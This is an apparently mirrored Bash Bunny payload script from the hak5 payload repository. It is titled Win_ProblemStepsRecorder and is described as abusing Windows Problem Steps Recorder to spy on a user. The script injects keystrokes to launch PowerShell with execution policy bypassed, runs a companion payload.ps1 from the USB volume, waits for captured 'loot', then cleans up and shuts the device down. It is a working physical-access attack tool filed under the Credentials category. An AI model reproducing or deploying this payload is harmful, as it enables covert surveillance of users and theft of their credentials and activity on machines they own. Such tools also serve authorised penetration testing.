mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
92 lines
2.0 KiB
Bash
92 lines
2.0 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: Win_ProblemStepsRecorder
|
|
#
|
|
# Description:
|
|
# Abuse of "Windows Problem Steps Recorder"
|
|
# to spy on a user's activities.
|
|
#
|
|
# Author: TW-D
|
|
# Version: 1.0
|
|
# Category: Credentials
|
|
# Target: Since Microsoft Windows 7 and 2008 R2
|
|
# Attackmodes: HID and STORAGE
|
|
#
|
|
# TESTED ON
|
|
# ===============
|
|
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
|
|
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
|
|
#
|
|
# NOTE
|
|
# ===============
|
|
# Use the browser "Internet Explorer" to read the ".mht" file correctly.
|
|
#
|
|
# STATUS
|
|
# ===============
|
|
# Magenta solid ................................... SETUP
|
|
# Yellow single blink ............................. ATTACK
|
|
# Yellow double blink ............................. STAGE2
|
|
# Yellow triple blink ............................. STAGE3
|
|
# Cyan inverted single blink ...................... SPECIAL
|
|
# White fast blink ................................ CLEANUP
|
|
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
|
|
|
|
######## INITIALIZATION ########
|
|
|
|
readonly BB_LABEL="BashBunny"
|
|
readonly RECORDER_TIME=300
|
|
|
|
######## SETUP ########
|
|
|
|
LED SETUP
|
|
|
|
ATTACKMODE HID STORAGE
|
|
GET SWITCH_POSITION
|
|
udisk mount
|
|
|
|
######## ATTACK ########
|
|
|
|
LED ATTACK
|
|
|
|
Q DELAY 7000
|
|
RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
|
|
Q DELAY 7000
|
|
|
|
LED STAGE2
|
|
|
|
Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)\""
|
|
Q ENTER
|
|
Q DELAY 3500
|
|
|
|
Q STRING "\$BB_SWITCH = \"\${BB_VOLUME}payloads\\${SWITCH_POSITION}\\\""
|
|
Q ENTER
|
|
Q DELAY 1500
|
|
|
|
Q STRING "CD \"\${BB_SWITCH}\""
|
|
Q ENTER
|
|
Q DELAY 1500
|
|
|
|
LED STAGE3
|
|
|
|
Q STRING ".\payload.ps1 -BB_VOLUME \"\${BB_VOLUME}\" -RECORDER_TIME ${RECORDER_TIME}"
|
|
Q ENTER
|
|
Q DELAY 1500
|
|
|
|
LED SPECIAL
|
|
|
|
until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done
|
|
|
|
######## CLEANUP ########
|
|
|
|
LED CLEANUP
|
|
|
|
rm /root/udisk/loot/done.txt
|
|
sync
|
|
udisk unmount
|
|
|
|
######## FINISH ########
|
|
|
|
LED FINISH
|
|
|
|
shutdown -h 0
|